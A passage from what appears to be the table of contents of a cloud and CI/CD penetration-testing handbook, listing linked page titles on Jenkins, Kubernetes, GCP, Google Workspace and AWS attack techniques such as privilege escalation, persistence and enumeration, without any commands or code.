Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) - * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) - * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) - * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) - * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) - * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) -* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) - * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) - * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) -* [Terraform Security](pentesting-ci-cd/terraform-security.md) -* [Atlantis Security](pentesting-ci-cd/atlantis-security.md) -* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) - * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) - * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) -* [Okta Security](pentesting-ci-cd/okta-security/README.md) - * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) -* [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) -* [Supabase Security](pentesting-ci-cd/supabase-security.md) -* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) -* [Vercel Security](pentesting-ci-cd/vercel-security.md) -* [TODO](pentesting-ci-cd/todo.md) - -## ⛈️ Pentesting Cloud - -* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) -* [Kubernetes 
Pentesting](pentesting-cloud/kubernetes-security/README.md) - * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) - * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) - * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) - * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) - * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) - * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) - * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) - * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) - * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) - * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes OPA 
Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) - * [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) - * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) - * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) - * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) -* [GCP Pentesting](pentesting-cloud/gcp-security/README.md) - * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) - * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) - * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) - * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) - * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) - * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) - * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) - * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) - * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) - * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - * [GCP - Compute Post 
Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) - * [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) - * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) - * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) - * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) - * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) - * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) - * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) - * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) - * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) - * [GCP - BigQuery 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) - * [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) - * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) - * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) - * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) - * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) - * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) - * [GCP - Secretmanager 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) - * [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) - * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) - * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) - * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) - * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) - * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) - * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) - * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) - * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) - * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) - * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) - * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) - * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) - * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) - * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) - * [GCP - Compute 
Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md)
- * [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md)
- * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md)
- * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md)
- * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md)
- * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md)
- * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
- * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md)
- * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md)
- * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md)
- * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md)
- * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md)
- * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md)
- * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md)
- * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md)
- * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md)
- * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md)
- * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md)
- * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md)
- * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md)
- * [GCP - Cloud Scheduler
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md)
- * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
- * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
- * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
- * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
- * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
- * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
- * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
- * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md)
- * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md)
- * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md)
- * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md)
- * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md)
- * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md)
- * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md)
- * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md)
- * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md)
- * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md)
- * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md)
- * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
- * [GCP - Stackdriver
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
- * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
- * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
- * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
- * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
- * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md)
- * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
- * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
- * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
- * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md)
- * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md)
- * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md)
- * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md)
- * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
- * [GCP - IAM, Principals & Org Unauthenticated
Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md)
- * [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
- * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md)
- * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md)
-* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md)
- * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md)
- * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md)
- * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md)
- * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md)
- * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md)
- * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md)
- * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md)
- * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md)
- * [GWS - App
Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md)
-* [AWS Pentesting](pentesting-cloud/aws-security/README.md)
- * [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md)
- * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
- * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
- * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
- * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
- * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
- * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
- * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)
- * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md)
- * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md)
- * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md)
- * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md)
- * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md)
- * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md)
- * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md)
- * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
- * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
- * [AWS - Lightsail
Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
- * [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
- * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
- * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
- * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
- * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
- * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md)
- * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
- * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
- * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
- * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
- * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
- * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
- * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
- * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md)
- * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md)
- * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
- * [AWS - EC2, EBS, SSM & VPC Post
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
- * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
- * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
- * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
- * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
- * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md)
- * [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md)
- * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
- * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md)
- * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md)
- * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
- * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
- * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md)
- * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md)
- * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md)
- * [AWS - S3 Post
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md)
- * [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
- * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md)
- * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md)
- * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md)
- * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
- * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
- * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md)
- * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
- * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
- * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
- * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
- * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
- * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)
- * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
- * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
- * [iam:PassRole,
codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
- * [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
- * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
- * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md)
- * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md)
- * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md)
- * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md)
- * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md)
- * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md)
- * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md)
- * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md)
- * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md)
- * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
- * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md)
- * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md)
- * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md)
- * [AWS - Glue
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md)
- * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md)
- * [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md)
